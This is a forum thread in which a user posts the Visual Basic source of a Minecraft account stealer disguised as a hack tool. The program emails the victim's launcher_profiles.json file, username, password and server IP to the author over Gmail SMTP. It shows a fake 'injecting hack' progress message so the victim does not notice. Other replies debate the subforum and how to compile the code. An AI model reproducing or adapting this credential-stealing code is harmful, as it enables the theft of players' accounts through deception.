Results 1 to 10 of 10
  1. #1
    wowees8's Avatar
    Join Date
    Aug 2011
    Gender
    male
    Posts
    78
    Reputation
    10
    Thanks
    130

    launcher_profiles.json stealer

    here is my code

    Code:
    Imports System.Net.Mail
    Public Class Form1
        Dim smtp As New SmtpClient
        Dim mail As New MailMessage
        Private Sub CheckBox2_CheckedChanged(sender As System.Object, e As System.EventArgs) Handles CheckBox2.CheckedChanged
    
        End Sub
    
        Private Sub CheckBox3_CheckedChanged(sender As System.Object, e As System.EventArgs) Handles CheckBox3.CheckedChanged
    
        End Sub
    
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            Timer1.Start()
            Dim MyMailMessage As New MailMessage()
            Try
                Dim Attch As Net.Mail.Attachment = New Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\launcher_profiles.json")
                MyMailMessage.Attachments.Add(Attch)
                MyMailMessage.From = New MailAddress("email@gmail.com")
                MyMailMessage.To.Add("different_email@gmail.com")
                MyMailMessage.Subject = ("Minecraft")
                MyMailMessage.Body = (TextBox1.Text + ":" + TextBox2.Text + Chr(13) + "Server IP:" + TextBox4.Text)
                Dim SMTP As New SmtpClient("smtp.gmail.com")
                SMTP.Port = 587
                SMTP.EnableSsl = True
                SMTP.Credentials = New System.Net.NetworkCredential("email@gmail.com", "password")
                SMTP.Send(MyMailMessage)
            Catch ex As Exception
            End Try
        End Sub
    
        Private Sub TextBox1_TextChanged(sender As System.Object, e As System.EventArgs) Handles TextBox1.TextChanged
    
        End Sub
    
        Private Sub TextBox2_TextChanged(sender As System.Object, e As System.EventArgs) Handles TextBox2.TextChanged
    
        End Sub
    
        Private Sub TextBox4_TextChanged(sender As System.Object, e As System.EventArgs) Handles TextBox4.TextChanged
    
        End Sub
    
        Private Sub Label3_Click(sender As System.Object, e As System.EventArgs) Handles Label3.Click
    
        End Sub
    
        Private Sub Label2_Click(sender As System.Object, e As System.EventArgs) Handles Label2.Click
    
        End Sub
    
        Private Sub Label1_Click(sender As System.Object, e As System.EventArgs) Handles Label1.Click
    
        End Sub
    
        Private Sub ProgressBar1_Click(sender As System.Object, e As System.EventArgs) Handles ProgressBar1.Click
    
        End Sub
    
        Private Sub CheckBox1_CheckedChanged(sender As System.Object, e As System.EventArgs) Handles CheckBox1.CheckedChanged
    
        End Sub
    
        Private Sub Timer1_Tick(sender As System.Object, e As System.EventArgs) Handles Timer1.Tick
            ProgressBar1.Increment(1)
            If ProgressBar1.Value = 100 Then
                Timer1.Stop()
                MsgBox("Injecting hack, Please wait UP TO 3 hours.")
            End If
        End Sub
    
        Private Sub Button2_Click(sender As System.Object, e As System.EventArgs) Handles Button2.Click
            MsgBox("Due to 1.6 login systems this has a 13% chance of working. So don't get your hopes up." + Chr(13) + "Also, if you spam it, it lowers the chances of working because it thinks you're hacking the server")
        End Sub
    End Class
    im not sure how to use the .json so i make them put the password and user. so far i only use the .json to see if its migrated account or not. in 1.5.2 instead of the .json i took the lastlogin. so even if they type in fake info i still have the account, if someone could find a way to find out passwords with the .json then it will work the same way

  2. #2
    LordPankake's Avatar
    Join Date
    Aug 2012
    Gender
    male
    Posts
    1,010
    Reputation
    260
    Thanks
    2,466
    My Mood
    Angry
    This should be in tutorials instead.

  3. #3
    wowees8's Avatar
    Join Date
    Aug 2011
    Gender
    male
    Posts
    78
    Reputation
    10
    Thanks
    130
    are you sure?

  4. #4
    ImysticZ's Avatar
    Join Date
    Apr 2013
    Gender
    male
    Posts
    69
    Reputation
    10
    Thanks
    6
    Quote Originally Posted by wowees8 View Post
    are you sure?
    A minecraft tool is for someone to download. You are posting a code that developers can use;tutorial.

  5. The Following User Says Thank You to ImysticZ For This Useful Post:

    LordPankake (07-19-2013)

  6. #5
    ayed12345's Avatar
    Join Date
    May 2013
    Gender
    male
    Location
    Texting Some People That I Hate Them.
    Posts
    438
    Reputation
    10
    Thanks
    70
    My Mood
    Crappy
    can anybody put a tutorial on how to use this? i get 20 errors when i put it in vb 2010 express XD (and i fail at programming)

  7. #6
    GioTheHuman2's Avatar
    Join Date
    Jul 2013
    Gender
    male
    Posts
    75
    Reputation
    29
    Thanks
    2
    Quote Originally Posted by wowees8 View Post
    are you sure?
    Yup , Its a tutorial
    Gloo's Alt.

    ON BRB , DONT MENTION/PM/QUOTE ME OR ILL KILL YOU IM ON BRB .

  8. #7
    wowees8's Avatar
    Join Date
    Aug 2011
    Gender
    male
    Posts
    78
    Reputation
    10
    Thanks
    130
    did you even create the buttons....

  9. #8
    lilbishehed's Avatar
    Join Date
    Jan 2013
    Gender
    male
    Location
    SPACE!!!!!!!!!!!!!!!!!!!!!
    Posts
    268
    Reputation
    27
    Thanks
    236
    My Mood
    Amazed
    Quote Originally Posted by ayed12345 View Post
    can anybody put a tutorial on how to use this? i get 20 errors when i put it in vb 2010 express XD (and i fail at programming)
    its for java
    use this coding program

    EDIT
    I think i'm wrong
    Last edited by lilbishehed; 07-19-2013 at 01:17 PM.

  10. #9
    LordPankake's Avatar
    Join Date
    Aug 2012
    Gender
    male
    Posts
    1,010
    Reputation
    260
    Thanks
    2,466
    My Mood
    Angry
    Quote Originally Posted by vhalavan15 View Post
    its for java
    use this coding program

    EDIT
    I think i'm wrong
    Last edited by LordPankake; 07-19-2013 at 05:28 PM.

  11. #10
    133spider's Avatar
    Join Date
    Oct 2012
    Gender
    male
    Posts
    387
    Reputation
    23
    Thanks
    6,049
    My Mood
    Tired
    Quote Originally Posted by vhalavan15 View Post
    its for java
    use this coding program

    EDIT
    I think i'm wrong

Similar Threads

  1. [Solved] launcher_profiles.json password
    By wowees8 in forum Minecraft Help
    Replies: 4
    Last Post: 08-09-2017, 06:55 PM
  2. Replies: 9
    Last Post: 11-09-2009, 05:40 AM
  3. Stealers!
    By Hotmess in forum Combat Arms Hacks & Cheats
    Replies: 15
    Last Post: 08-21-2008, 12:00 AM
  4. Account stealer ??
    By floris12345! in forum WarRock - International Hacks
    Replies: 6
    Last Post: 05-27-2008, 02:18 PM
  5. real ********** stealer
    By llvengancell in forum WarRock - International Hacks
    Replies: 4
    Last Post: 09-24-2007, 05:36 PM